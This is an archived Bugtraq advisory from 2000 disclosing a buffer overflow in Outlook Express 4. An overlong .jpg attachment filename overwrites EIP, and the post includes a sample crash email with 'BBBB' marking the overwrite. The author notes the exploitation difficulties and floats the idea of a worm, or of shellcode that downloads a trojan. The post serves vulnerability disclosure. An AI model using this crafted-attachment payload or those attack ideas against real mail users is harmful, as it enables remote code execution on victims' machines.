Bugtraq mailing list archives
Overflow in Outlook Express 4.* - too long filenames with graphic format extension
From: Ultor () HERT ORG (Ultor)
Date: Fri, 12 May 2000 14:05:28 +0200
==== APPLICATION AFFECTED Outlook Express 4.* (5.* is not affected) ==== DESCRIPTION All attached graphic files are automatically shown in the Outlook Express while viewing the e-mail. The problem is that long filenames with *.jpg *.bmp extension makes overflow if filename lenght is longer then 256 characters. ==== EXAMPLE We need more than 267 characters to overwrite EIP cause of 'C:\TEMP' on the begining of buffer. This makes little problem with exploitation. Here is example of such e-mail ------=_NextPart_000_0008_01BF5479.70140740 Content-Type: text/plain; name="hert.jpg" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="AAAABBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.jpg" ------=_NextPart_000_0008_01BF5479.70140740-- EIP is overwriten here by 'BBBB'. ==== EXPLOITATION It's little hard to exploit it cause buffer is addressed in addr with '00' and we got 'C:\TEMP' which overwrites stack before our data. You will need some tricks to exploit this. I believe this bug could be very dangerous if connected somehow with worm cause you would only have to view the message to run the exploit. Using shellcode which downloads trojan from some URL on the affected machine would be interesting idea too. Greeetz to HERT,Lam3rZ,TESO ---------------------- Mark Bialoglowy [Ultor () hert org] --- Network Security Consultant Age: 19 -- Country: PL -- PGP: http://www.hert.org/pgp/Ultor.asc CODE: C / Delphi / w32asm / Linux / SQL / CGI / HTML / VRML / AI ---------------------- <STRONG>attached mail follows:</STRONG><HR NOSHADE><HR NOSHADE> <UL> <LI>message/rfc822 attachment: crash_oe.eml </UL>
Current thread:
- Re: non-exec stack, (continued)
- Re: non-exec stack Casper Dik (May 08)
- Re: non-exec stack Gert Doering (May 09)
- Re: non-exec stack Casper Dik (May 09)
- Re: non-exec stack Nate Eldredge (May 10)
- »Ø¸´: Re: non-exec stac ZhaoQian (May 10)
- Alert: IIS ism.dll exposes file contents Cerberus Security Team (May 11)
- ISSalert: Internet Security Systems Security Advisory: Microsoft IIS Remote Denial of Service Attack Warren Barrow (May 11)
- Remote DoS attack in Internet Information Server 4.0 & 5.0 "Malformed Extension Data in URL" Vulnerability Ussr Labs (May 11)
- Microsoft Security Bulletin (MS00-030) Microsoft Product Security (May 11)
- IE Domain Confusion Vulnerability Foo Bar (May 11)
- Overflow in Outlook Express 4.* - too long filenames with graphic format extension Ultor (May 12)
- Eudora Sensitive to Long Filenames Ron Moritz (May 18)
- IE Domain Confusion Vulnerability is an Email problem also Richard M. Smith (May 12)
- Re: IE Domain Confusion Vulnerability doesn't matter much Marc Slemko (May 12)
- Re: IE Domain Confusion Vulnerability doesn't matter much Richard M. Smith (May 15)
- Vulnerability in CGI counter 4.0.7 by George Burgyan Howard M. Kash III (May 15)
- Vulnerability in EMURL-based e-mail providers Pierre Benoit (May 15)
- Re: non-exec stack Gert Doering (May 09)
- Re: non-exec stack Casper Dik (May 08)
- New Solaris root exploit for /usr/lib/lp/bin/netpr Anonymous (May 12)
- Microsoft Security Bulletin (MS00-034) Microsoft Product Security (May 12)
- Microsoft Office 2000 Advisory dildog (May 12)